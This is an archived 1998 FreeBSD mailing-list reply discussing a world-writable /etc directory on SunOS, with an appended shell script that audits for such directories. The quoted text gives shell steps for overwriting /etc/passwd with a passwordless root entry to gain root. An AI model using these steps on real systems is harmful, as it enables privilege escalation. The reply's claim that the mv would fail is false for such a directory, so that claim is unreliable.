Date: Fri, 18 Dec 1998 09:54:54 -0000
From: "Bond, Jeffery" <Jeff.Bond@nectech.co.uk>
To: "'FreeBSD questions'" <questions@FreeBSD.ORG>
Cc: "'cjc@cc942873-a.ewndsr1.nj.home.com'" <cjc@cc942873-a.ewndsr1.nj.home.com>
Subject: RE: Basic Security Question
Message-ID: <084DD226F592D211988800A024AC583B02B783@exchange.nectech.co.uk>
>Mark Ovens wrote,
>
>> and on all the Sparcs running SunOS4.1.3_U1 here are:
>>
>> gppsun4:/{8}% ls -ldug etc
>> drwxrwsrwx 10 bin staff 2048 Dec 17 09:30 etc
>>
>> which is even less secure as it's writable by all!
>
>I may be dense. Is that some kind of joke or something? As dense as I
>am, I know for sure that even I could take any account on a system
>with permissions like that and have control of root in this many
>keystrokes:
>
>% cd /etc
>% echo "root::0:0:Evil Root:/:/bin/csh" > passwd.new
>% mv passwd passwd.old
>% mv passwd.new passwd
>% su
>#

Just because the directory is writable, this doesn't mean the existing files
in it are too. You won't be able to do 'mv passwd passwd.old'.

Jeff
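
Added example, not part of the thread: on POSIX systems, renaming or unlinking a directory entry is checked against the directory's write and search permission, and the sticky bit limits it to the owner of the entry or of the directory (or root). The script below, whose helper names risky_dirs and dir_status are hypothetical, audits for directories in the state shown in the ls listing above: world-writable with no sticky bit.

```shell
#!/bin/sh
# Added example: audit for directories whose entries any local user can
# rename or unlink (world-writable, sticky bit not set).
# Function names are hypothetical; only standard find(1) tests are used.

# risky_dirs ROOT...
# Prints each directory under the given roots that is world-writable
# (o+w, octal 0002) without the sticky bit (octal 1000). -xdev keeps the
# walk on one filesystem; unreadable subtrees are skipped quietly.
risky_dirs() {
    find "$@" -xdev -type d -perm -0002 ! -perm -1000 -print 2>/dev/null
}

# dir_status DIR
# Classifies a single directory without descending into it:
#   risky  - world-writable, no sticky bit (the drwxrwsrwx case)
#   sticky - world-writable, but deletion and rename are restricted to
#            owners, as on /tmp
#   ok     - not world-writable
dir_status() {
    if [ -n "$(find "$1" -prune -type d -perm -0002 ! -perm -1000 -print 2>/dev/null)" ]; then
        echo risky
    elif [ -n "$(find "$1" -prune -type d -perm -1002 -print 2>/dev/null)" ]; then
        echo sticky
    else
        echo ok
    fi
}

# When invoked with arguments, audit those trees, e.g.: sh audit.sh /etc /usr
if [ "$#" -gt 0 ]; then
    risky_dirs "$@"
fi
```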
